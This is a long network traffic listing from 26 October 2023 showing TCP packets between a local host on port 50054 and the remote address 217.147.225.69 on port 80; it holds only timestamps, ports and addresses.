                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.244656086 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.244688034 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.244710922 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.244750023 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.244772911 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.244811058 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.244854927 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.244873047 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.244934082 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.244983912 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.244997978 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.245031118 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.245060921 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.245106936 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.245141983 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.245203972 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.245244980 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.245265007 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.245313883 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.245326042 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.245371103 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.245388031 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.245450974 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.245450020 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.245511055 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.245513916 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.245573044 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.245634079 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.245695114 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.245702028 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.245702982 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.245755911 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.245784998 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.245820045 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.245865107 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.245884895 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.245948076 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.246009111 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.246033907 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.246071100 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.246093988 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.246133089 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.246149063 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.246195078 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.246198893 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.246257067 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.246318102 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.246320009 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.246376038 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.246377945 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.246437073 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.246439934 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.246503115 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.246563911 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.246568918 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.246627092 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.246629000 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.246689081 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.246696949 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.246752024 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.246774912 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.246814013 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.246876001 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.246912956 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.246939898 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247003078 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247066975 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247078896 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247080088 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247132063 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247142076 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247188091 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247248888 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247311115 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247370958 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247401953 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247401953 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247433901 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247482061 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247484922 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247503996 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247522116 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247539997 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247558117 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247575045 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247592926 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247594118 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247611046 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247628927 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247647047 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247664928 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247683048 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247684002 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247700930 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247704983 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247720003 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247736931 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247755051 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247767925 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247772932 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247791052 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247809887 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247828007 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247845888 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247864962 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247878075 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247881889 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247900963 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247919083 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247936964 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247955084 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247972965 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.247991085 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248007059 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248008966 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248034954 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248053074 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248070955 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248090029 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248107910 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248126030 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248125076 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248143911 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248162031 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248181105 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248198986 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248217106 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248234987 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248251915 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248270035 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248287916 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248306036 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248323917 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248333931 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248333931 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248342037 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248359919 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248378992 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248397112 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248414993 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248433113 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248435974 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248450041 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248467922 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248469114 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248486996 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248505116 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248522997 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248541117 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248558044 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248575926 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248594046 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248611927 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248631001 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248648882 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248667002 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248683929 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248702049 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248709917 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248719931 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248738050 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248756886 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248774052 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248791933 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248800993 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248811007 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248828888 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.248847961 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.249002934 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.249103069 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.532658100 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.532733917 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.532790899 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.532849073 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.532902956 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.532929897 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.532929897 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.532958031 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.532989979 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.533011913 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.533066034 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.533112049 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.533119917 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.533159971 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.533174038 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.533229113 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.533282995 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.533282995 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.533330917 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.533335924 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.533391953 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.533447027 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.533458948 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.533458948 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.533504009 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.533634901 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.533701897 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.533750057 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.551537991 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.551737070 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.551887989 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.551960945 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.552036047 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.552104950 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.552129984 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.552160025 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.552201033 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.552216053 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.552269936 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.552324057 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.552376986 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.552373886 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.552429914 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.552437067 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.552484035 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.552489042 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.552535057 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.552536964 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.552591085 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.552606106 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.552644014 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.552705050 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.552747965 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.552778959 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.552802086 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.552834988 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.552855968 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.552892923 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.552911043 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.552963972 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.552964926 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553020954 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553066015 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553075075 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553117037 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553128958 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553181887 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553181887 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553236961 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553278923 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553289890 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553344965 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553392887 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553396940 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553451061 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553459883 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553503990 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553540945 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553556919 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553599119 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553611994 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553667068 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553714991 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553719044 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553772926 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553780079 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553827047 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553844929 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553879023 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553931952 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553936005 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.553985119 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.554038048 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.554039955 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.554094076 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.554105997 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.554147005 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.554183006 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.554199934 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.554253101 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.554261923 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:49.554305077 CEST8050054217.147.225.69192.168.11.20
